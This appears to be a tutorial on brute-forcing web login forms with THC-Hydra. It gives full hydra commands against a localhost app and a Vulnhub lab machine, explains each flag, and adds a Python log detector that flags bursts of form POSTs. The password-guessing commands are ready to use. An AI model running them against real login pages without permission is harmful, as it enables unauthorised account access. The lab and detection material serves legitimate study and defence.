THC-Hydra BruteForce
Localhost Example
$ hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-post-form '/#/login:email=^USER^&password=^PASS^:Invalid email or password.' -fV -s 3000 -t 1
Vulnhub Example
When we enter a random key into the form on this page, we get “invalid key”. We can use this to formulate a hydra command: choose the big.txt wordlist, select http-post-form, give the address 10.10.10.3, the location of the form “/kzMb5nVYJw/index.php” with our field “key” and the ^PASS^ string (the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^), and the third colon-delimited argument that designates failure, “invalid key”. -l is for our login name, which is empty, -f is for exit when a login/pass pair is found, and -V is for verbose.
$ hydra -P /usr/share/dirb/wordlists/big.txt 10.10.10.3 http-post-form "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -fV -l ""
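Seen from the server, the form guessing above is a burst of POSTs to the form path from one source, and since a failed guess is recognised by the “invalid key” text in the response body, the HTTP status alone does not separate failures from successes. The added example below (not part of the original page) counts POSTs per source IP in a sliding window over Common Log Format lines; the log lines, the addresses 10.10.10.7 and 10.10.10.20, the threshold and the window are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common Log Format: ip ident user [time] "METHOD path proto" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" \d{3} \S+'
)

def detect_form_bruteforce(lines, login_path, threshold=5, window=timedelta(seconds=10)):
    """Return {ip: peak number of POSTs to login_path seen inside `window`}
    for every source that reaches `threshold`. Lines must be in time order."""
    recent = defaultdict(deque)  # ip -> timestamps of POSTs still inside the window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # unparsable line, or a normal page view
        if m["path"].split("?")[0] != login_path:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop attempts that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(q))
    return peaks

def sample_log():
    """Constructed sample: one source submitting the form once per second,
    one user who mistypes once and retries minutes later, plus noise."""
    form = "/kzMb5nVYJw/index.php"
    lines = [
        f'10.10.10.7 - - [12/Mar/2024:10:00:{s:02d} +0000] "POST {form} HTTP/1.1" 200 312'
        for s in range(8)
    ]
    lines += [
        f'10.10.10.7 - - [12/Mar/2024:10:00:09 +0000] "GET {form} HTTP/1.1" 200 298',
        f'10.10.10.20 - - [12/Mar/2024:10:00:30 +0000] "POST {form} HTTP/1.1" 200 312',
        f'10.10.10.20 - - [12/Mar/2024:10:05:41 +0000] "POST {form} HTTP/1.1" 302 0',
        "truncated or malformed line",
    ]
    return lines

if __name__ == "__main__":
    for ip, peak in detect_form_bruteforce(sample_log(), "/kzMb5nVYJw/index.php").items():
        print(f"{ip}: {peak} form submissions within 10s")
```

Tune the threshold and window against normal traffic for the form before alerting on it; the same count can drive rate limiting or lockout at the application.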